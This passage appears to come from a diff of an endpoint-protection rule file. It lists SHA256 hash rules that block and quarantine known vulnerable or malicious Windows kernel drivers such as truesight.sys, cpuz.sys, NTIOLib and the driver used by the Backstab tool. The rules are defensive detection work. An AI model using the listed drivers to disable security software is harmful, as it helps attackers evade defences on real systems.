"edf3fff43d2c3ec7530359d6042a4837238da206d2aa2381d698e3c10037381d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e07cc808-7faf-597c-bf8b-80fd01024b3e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155558Z", + 
"creation_date": "2026-03-23T11:45:31.155560Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155565Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c4543a2cf342355f2b1ac4e79b126115076b6cb2ebbc62529782378cf2b42cc0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e090feec-2655-5af2-9ee6-30946610a2f8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476274Z", + "creation_date": "2026-03-23T11:45:31.476278Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476288Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "24a915857be068a8463703543fff24c763654d7d4ce6be40c7326fa148f6256c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e0911209-0e96-5071-8a07-1d12cd50e46e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829061Z", + "creation_date": "2026-03-23T11:45:30.829063Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829069Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "778214a28e54d8e912649dd155e1ecd6d726bb7e9b0838acfc31786cf9654529", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e09c6930-6c1b-57b2-ae10-d2f297e2c3a6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140547Z", + "creation_date": "2026-03-23T11:45:31.140549Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140555Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1bba43e137244ad10af8166cfe65780d1d42428cd0caba37ce5902f72187a208", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e09d84c6-03a2-54ad-b4cc-765ab16a6e21", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475216Z", + "creation_date": "2026-03-23T11:45:30.475219Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475228Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "648994905b29b9c4a1074eef332bf6932b638bad62df020b5452c74e2b15d78f", + "comment": "Vulnerable Kernel Driver (aka semav6msr.sys) [https://www.loldrivers.io/drivers/142453a2-a24d-4b35-8922-6d5939f1c0fc/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e09e8f67-f283-5401-909b-698973374f55", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493171Z", + "creation_date": "2026-03-23T11:45:31.493174Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493183Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "799a8563d1b6efbfe833116c8af3b619bdf658ddba39cff7c7bb35e3f430b76b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e0c45fe2-421a-503d-ba84-3f298ad5a79b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978353Z", + "creation_date": "2026-03-23T11:45:29.978355Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978361Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1aaf4c1e3cb6774857e2eef27c17e68dc1ae577112e4769665f516c2e8c4e27b", + "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/a7628504-9e35-4e42-91f7-0c0a512549f4/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e0c65e9c-03cf-590e-8e72-7d6bd8b2a89a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488134Z", + "creation_date": "2026-03-23T11:45:31.488136Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488142Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3f631ad95bb296997a4d86cdcae9a5f4d2a05b47bdfab471b0905369bbbf4a32", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e0c6c1e7-7981-5c79-a6af-acb20f39b7d3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809315Z", + "creation_date": "2026-03-23T11:45:31.809318Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809326Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f34be2c55f8a0102fedc6362afca94528c7ca5f52d5e260b64a5948b2723aad9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e0d679e1-613d-53ad-abf6-8530048afdd5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144718Z", + "creation_date": "2026-03-23T11:45:31.144720Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144725Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3cd869794481f84f25229883550c0f02597f5ad1c44a3c5724ef0cddd236d4e1", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e0e51d84-9daf-5b1a-969b-f709939b5a32", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493293Z", + "creation_date": "2026-03-23T11:45:31.493295Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493301Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "de4d8898dc5f8aadfe91dcf6735867e1fd204e0877a9ea8b0ccfd5d85a1dac8c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e0ecb629-6364-5f83-bcb2-4d33f5bf794f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", 
+ "last_update": "2026-03-23T11:45:29.981782Z", + "creation_date": "2026-03-23T11:45:29.981784Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981789Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "79e7165e626c7bde546cd1bea4b9ec206de8bed7821479856bdb0a2adc3e3617", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e0f005b5-4ef7-52d6-87b6-3b66572a1ae4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149771Z", + "creation_date": "2026-03-23T11:45:31.149773Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149779Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "92f884e715a70dd25c030410f9b03b17ad8aacabc524fa081979abffbd00d744", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e0f4d53b-da5a-5a82-8c15-a2dabae7788a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146026Z", + "creation_date": "2026-03-23T11:45:32.146029Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146034Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e055fdfb914e3da936eb7745acb665f50346df9abac597cf43d487262a6a12d5", + "comment": "Malicious Kernel Driver (aka kavservice.bin) [https://www.loldrivers.io/drivers/77157886-00f9-4f6e-b217-d896813b630f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e1027d6a-d5e2-5b56-ae59-586d13148821", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615451Z", + "creation_date": "2026-03-23T11:45:29.615453Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.615459Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fa861c61102cbcaa1e5f6020deaa066c4fcdfaee3ded1ee156ab81d59ad54f9a", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e10de787-42a8-5045-9d48-f1f478df1b75", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605395Z", + "creation_date": "2026-03-23T11:45:29.605397Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605402Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cdfbe62ef515546f1728189260d0bdf77167063b6dbb77f1db6ed8b61145a2bc", + "comment": "Backstab Process Explorer driver (aka PROCEXP.SYS) [https://github.com/Yaxser/Backstab/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e10ff572-a15d-5cef-9a2e-3bea9f95590e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.473912Z", + "creation_date": "2026-03-23T11:45:30.473915Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.473924Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6b56978dd0fc606668c0ed2698b3b22ef53dc6e4a676a4c5479438425d4e60a9", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e13e6e5d-d62a-562d-a1a5-c66500741f20", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455136Z", + "creation_date": "2026-03-23T11:45:30.455140Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455148Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0123c7f12dd7530d55aee49949ff1fee911c9689bd04591684aa641882589785", + "comment": 
"Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e141ddae-7102-5721-bfa7-e36f20989306", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498063Z", + "creation_date": "2026-03-23T11:45:31.498067Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498076Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "148653ffa53559fdb98c87a1f562487ad6632d33fc76d57f696a5eba9cf5e9ef", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e14ec1cc-7658-5824-b7fe-4a3aee46c8d6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:32.146502Z", + "creation_date": "2026-03-23T11:45:32.146505Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146514Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "25819a8c8f2ebceef661d751a56a024a5584f8283d9600273e52d18923c9f455", + "comment": "Malicious Kernel Driver (aka f.sys) [https://www.loldrivers.io/drivers/17a1ad58-ecf3-4dea-b1ca-336880d15256/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e15496d7-da94-54cf-ac92-c8f109458674", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145912Z", + "creation_date": "2026-03-23T11:45:32.145914Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145919Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d9f15d91397d1c8d01b6d6871c4f18f3a85ca85f091a92f4e9221524344ca5fe", + "comment": "Malicious Kernel Driver (aka driver_d9f15d91.sys) [https://www.loldrivers.io/drivers/576bb95a-f15e-4a0d-bcee-08791e1504e2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e15f2979-06b1-5cab-8cef-be42b7834720", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836282Z", + "creation_date": "2026-03-23T11:45:30.836285Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836294Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "526d9241fcf4b67d9c11103a007f648e4f7acb5c82d6bc10df1d836c11d44a03", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e1607942-a038-5718-b613-8aa5fc4886ee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606667Z", + "creation_date": "2026-03-23T11:45:29.606669Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.606675Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dd15583e9503a6a5e37aa695a9625fe10abb0ea67f298ef529e0061d67aca99b", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e162139f-f7cc-50d7-80b3-875f45d23bb4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981420Z", + "creation_date": "2026-03-23T11:45:29.981422Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981427Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3d8cfc9abea6d83dfea6da03260ff81be3b7b304321274f696ff0fdb9920c645", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e170d139-8d3a-58d0-bb5b-af7d4ca11b6b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
